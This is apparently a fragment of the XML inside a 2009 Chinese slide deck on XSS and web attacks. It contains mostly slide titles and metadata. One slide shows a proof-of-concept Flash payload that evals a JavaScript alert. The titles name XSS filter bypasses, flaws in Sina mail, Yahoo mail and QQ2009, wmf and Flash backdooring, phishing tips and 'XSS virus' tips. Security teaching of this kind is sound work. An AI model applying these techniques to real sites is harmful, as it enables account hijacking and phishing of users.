              <a:t>ExternalInterface.call("eval", "try{alert(/xeye/);}catch(e){window.location.reload();}");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>pdf xss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>applet xss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>wmf xss</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://sites.google.com/site/tentacoloviola/backdooring-windows-media-files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>…</a:t>
            </a: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技巧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技巧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技巧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2080</TotalTime>
  <Words>2012</Words>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>332</Paragraphs>
  <Slides>49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0" baseType="lpstr">
      <vt:lpstr>技巧</vt:lpstr>
      <vt:lpstr>Cross Site Attack</vt:lpstr>
      <vt:lpstr>攻击维度不单一</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS类型</vt:lpstr>
      <vt:lpstr>哪里可以XSS</vt:lpstr>
      <vt:lpstr>Bypass XSS Filter</vt:lpstr>
      <vt:lpstr>1、HTML中有多处可以合法执行JS</vt:lpstr>
      <vt:lpstr>2、HTML中的其它媒体元素导致的XSS</vt:lpstr>
      <vt:lpstr>3、浏览器解析处理差异导致的XSS</vt:lpstr>
      <vt:lpstr>4、浏览器特性导致的XSS（一）</vt:lpstr>
      <vt:lpstr>4、浏览器特性导致的XSS（二）</vt:lpstr>
      <vt:lpstr>5、浏览器bug导致的XSS</vt:lpstr>
      <vt:lpstr>6、编码问题导致的XSS</vt:lpstr>
      <vt:lpstr>7、不完备的黑名单策略导致的XSS</vt:lpstr>
      <vt:lpstr>8、XSS Filter本身的缺陷导致的XSS</vt:lpstr>
      <vt:lpstr>我们的目标是什么</vt:lpstr>
      <vt:lpstr>幻灯片 18</vt:lpstr>
      <vt:lpstr>Bypass sina mail xss filter</vt:lpstr>
      <vt:lpstr>yahoo mail xss</vt:lpstr>
      <vt:lpstr>yahoo mail xss</vt:lpstr>
      <vt:lpstr>幻灯片 22</vt:lpstr>
      <vt:lpstr>XML file XSS</vt:lpstr>
      <vt:lpstr>幻灯片 24</vt:lpstr>
      <vt:lpstr>Flash Parameter Injection  </vt:lpstr>
      <vt:lpstr>Flash封装网马</vt:lpstr>
      <vt:lpstr>幻灯片 27</vt:lpstr>
      <vt:lpstr>QQ2009 XSS</vt:lpstr>
      <vt:lpstr>QQ2009 XSS</vt:lpstr>
      <vt:lpstr>QQ2009 XSS</vt:lpstr>
      <vt:lpstr>QQ2009 XSS</vt:lpstr>
      <vt:lpstr>幻灯片 32</vt:lpstr>
      <vt:lpstr>wmf hijack iframe</vt:lpstr>
      <vt:lpstr>wmf hijack iframe</vt:lpstr>
      <vt:lpstr>wmf hijack iframe</vt:lpstr>
      <vt:lpstr>wmf hijack iframe</vt:lpstr>
      <vt:lpstr>XSS能做什么</vt:lpstr>
      <vt:lpstr>同源策略</vt:lpstr>
      <vt:lpstr>XSS War, Browsers War!</vt:lpstr>
      <vt:lpstr>幻灯片 40</vt:lpstr>
      <vt:lpstr>Phishing Tips</vt:lpstr>
      <vt:lpstr>Phishing Tips</vt:lpstr>
      <vt:lpstr>Phishing Tips</vt:lpstr>
      <vt:lpstr>幻灯片 44</vt:lpstr>
      <vt:lpstr>XSS Virus Tips</vt:lpstr>
      <vt:lpstr>XSS Virus Tips</vt:lpstr>
      <vt:lpstr>XSS Virus Tips</vt:lpstr>
      <vt:lpstr>相关资源</vt:lpstr>
      <vt:lpstr>欢迎交流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 Web Attack</dc:title>
  <cp:lastModifiedBy>cosine</cp:lastModifiedBy>
  <cp:revision>577</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-07-16T04:48:51Z</dcterms:modified>
</cp:coreProperties>
</file>